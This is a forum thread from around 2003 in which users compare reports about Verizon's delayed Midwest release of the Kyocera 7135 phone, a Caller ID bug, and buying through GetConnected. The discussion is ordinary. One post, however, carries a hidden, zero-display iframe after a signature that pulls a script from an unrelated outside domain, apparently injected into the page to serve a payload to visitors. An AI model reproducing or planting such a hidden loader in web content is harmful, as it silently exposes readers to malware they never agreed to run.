+ Reply to Thread
Page 1 of 2 1 2 LastLast

7135 Chicago and Midwest Problem

As I posted earlier today, I was told by a Verizon supervisor that there was a technical problem in Chicago - something to do with the analog system. Also he said there was no inventory of 7135's in the midwest ditribution center which he said is located in Memphis, TN. At first I was very skeptical but another post raised the same issue today. Also I just checked ordering from Get-Connected and the web site wouldn't display the 7135 as a choice in Chicago but it did for other zip codes I tried outside of the midwest.

Because of the above developments I thought a new thread might collect more data on this subject because it will certainly affect the release date in the midwest.

Any input from others on this board would be most appreciated.

RayB<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I spoke with my B2B guy here in Grand Rapids, Michigan, and he said that they have already released their first shipment here in town, but should be getting more this week. (Including one for me!)

Tho I have also heard from the 800-2JoinIn # the same party line you refer to.

Hmmm. I wonder what the issue could be. I live in nowhere'sville, Indiana, I ordered from GetConnected, got the phone, and have been enjoying it for seven wonderful days. I can see no "technical" issues that effect the phone in my particular small market. I have been able to activate the phone on verizon, and update the phone with the newest firmware.

I cannot imagine what the "technical" issues would be.

Re: Chicago
    by: jsimonson0 04-09-2003 at 04:49 AM

quote:
    --------------------------------------
    Originally posted by DougF
    Verizon guy just called me back to tell me that shipping delay is because the phone is not working in the midwest -- he claims there are severe problems that he could not identify. However, he did say that these problems would all be resolved (must be magic!) by 4/28 and phone would ship then. When I referenced GetConnected he strongly discouraged it, telling me the phone would have serious problems in Chicago.

Sounds like a scam. Anybody have one in Chicago and are they suffering from "serious problems"
    --------------------------------------------------------------------------------

I'm not having "serious" problems, but I do have the Caller ID bug, which has been very persistent recently...

RayB

"Re: Re: Re: Chicago
    by: alanb 04-09-2003 at 09:35 AM

quote:
    --------------------------------------------------------------------------------
    Originally posted by kevinmk
    What is the "Caller ID bug"??? Just curious (even though I'm in Nashville), as I should get my phone Friday from GetConnected....

I'll summarize rather then pointing you to the search becuase this one comes back with a lot of hits.....

Some/all of the early adopter phones, in some areas, but not others (with the same phone) will recieve a call, and the callerID, and associated address book record if there is a match, does not appear until after the call is answered. So, the callerID is being delivered by Verizon, but not being correctly processed by the phone. But since it only happens in some areas, there is some network component to the issue as well. Problem seems particularly prevelent in the NY metro area.

We are waiting to see if the new Verizon branded phones with the new firmware also exerience the problem. There is a rumour that it was fixed in the firmware of the phone.

Alan"

RayB

Get-Connected's Response

FWIW -They said that there is no technical problem with the phone in the Midwest area. Also said that Get-Connected does not have a contract with Verizon in the midwest area and therefore can only sell the phone w/o a Verizon contract.

RayB

I contacted Verizon customer service and telesales yesterday via phone numbers 1-800-922-0204 and 1-800-256-4646, respectively. Both the representatives said that the phone is not available yet in my area (Milwaukee, Wisconsin) and would not even let me try to order it either. The telesales person said they would put my name on their rather large waiting list of people to call back when the phone does become available. This is frustrating!!

Would I have better luck if I call their Business 2 Business number, which I believe is 1-866-865-1825 ????
    Michael

From Another Discussion Board

"There are three major regions for Verizon, east, west, and central.

I have my phone in the east, and it has never had a problem, I can even switch plans half way through the month and they will pro rate me.

My fiance has her phone from central, ohio. She's had all sorts of trouble. Including she can only switch plans when her billin cycle starts over, or else she winds up paying full price for both plans.

Central blows. Move to the east or west coast.

Just my two cents. lol.

-Bryan"

RayB

I live here in Wichita KS We have never had any problems with the 7135 and verizon. I have had it for several months now, switching plans, turning on express network then off. I think they are feeding you a line of ____ . I don't know how I could get any more "Central"
    -=Jimmyjoe=-

Originally posted by jimmyjoe
    I live here in Wichita KS We have never had any problems with the 7135 and verizon. I have had it for several months now, switching plans, turning on express network then off. I think they are feeding you a line of ____ . I don't know how I could get any more "Central"
    Here in Minnesota I have not had any problems either. All is wonderful here. Never had the Caller ID bug:alieneyes , never want to.
    ~'kito
    pdaPhoneHome Moderator

How long has the 7135 been available in Minnesota?? I'm in Milwaukee and can't get one no matter what I do. Seems very strange to me.
    Michael

rgs
    I live in St. Louis. My Bus Rep said that the 7135 was available to him on Monday. I plan on playing with his phone and then ordering mine on Friday! The Retail Rep I deal with at the local VZW store says that she will have them on 04/28. Customer Care Midwest, however, says that the 7135 is not in their inventory, it is not available either in my specific market (Kansas/Missouri) or anywhere in the entire Midwest, it is "still in testing stages", and they cannot give any dates for availability in St. Louis other than "sometime this month." There was no mention of any specific technical problem either in my market or in the Midwest in general. Right now, I'll stick with my Biz Rep's story, since that is the one which puts me closest to being a 7135 owner!

Originally posted by Michael Rye
    How long has the 7135 been available in Minnesota?? I'm in Milwaukee and can't get one no matter what I do. Seems very strange to me.
    Michael,

I too am in Milwaukee! What a coincidence!

Anyway, I've had my 7135 since January. I got it through GetConnected.com, paid full price too(ouch).

I'm probably going to be getting at least two more phones through Verizon for my company once they actually become available.

Let me know if you've got any Milwaukee-oriented questions! (I noticed you don't have PMs or emails turned on, so you'll have to email me)

Later,

Cool Cat
    Sorry, but I no longer make 7135 headset adapters.

"Got it in Chicago
    by: DougF 04-09-2003 at 04:24 PM

OK -- I complained earlier that I had ordered from telesales on 4/4 for delivery to Chicago and my order was cancelled because of alleged problems with network in Chicago. I called rep last night and asked if there was anything he could do to get me phone prior to 4/28 and he said no way. Believe it or not, today the phone arrived via Fedex. I charged it, activiated it and made a call.
    Talk about screwy business practices. Anyway, its smaller than I expected and I'm going to start figuring out everything it can do."

RayB

Spoke to verizon rep via 2-join-in. Phone was to be released this week but is being held up in midwest. He didn't have a reason. It is available in other areas (NY). There are units in the warehouse (I think he said something like 8000 or was it a thousand???). The phone could be out next week.

So Close

Per another thread I picked up on the idea to call Seattle and try to order there. I called the west district telesales and the rep said they had the 7135 and were taking my order until I said IL. Thats when she said she couldn't process to an out of area state. She said their distribution center got them this past monday. So close.

She transferred me to a midwest telesales number and he said the 7135 should be in their warehouse in the next week.

RayB

Verizon is a patchwork of previously individual carriers brought under one umbrella, like GTE, PrimeCo, Ameritech, etc... The crazy billing differences between NY and Ohio might be related to the quality of the billing systems in the two areas. Ohio may have an older billing system that cannot support proration, hence the change plan only on the billing date problem.

Can't see a network problem, though, because CDMA switches are really new (relative, to billing systems).

RayB, I hope that midwest telesales rep is right about next week.
    This is starting to drive me nuts...

Michael Rye,
    I too bought mine through GetConnected.com and activated it through Verizon about two and a half months ago. It has worked beautifully and I am soooooooooo glad that I haven't waited all this time for Verizon. It was actually worth paying FULL price to have had it for so long already and of course to not have the ugly-a** Verizon logo on the front.

I'm glad that Coolcat chimed in, because I was just about to mention him to you.

Also, by the way, "Steve" lives here in the Twin Cities and he just got his official Verizon 7135 from Verizon Corporate Sales yesterday (Tues. 4/ and it works perfectly.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by coolcat
    Michael,
    I too am in Milwaukee! What a coincidence!
    ... snip ...
    Let me know if you've got any Milwaukee-oriented questions! (I noticed you don't have PMs or emails turned on, so you'll have to email me)
    Later,
    Cool Cat
    Hey, a fellow Cheesehead! I saw your website with the 90 degree adapters for headsets. Great stuff! I'll probably be buying one from you once I actually get the phone first. Also, I've activated my private messages on here. I'll keep you in mind for questions. Thanks!!
    Michael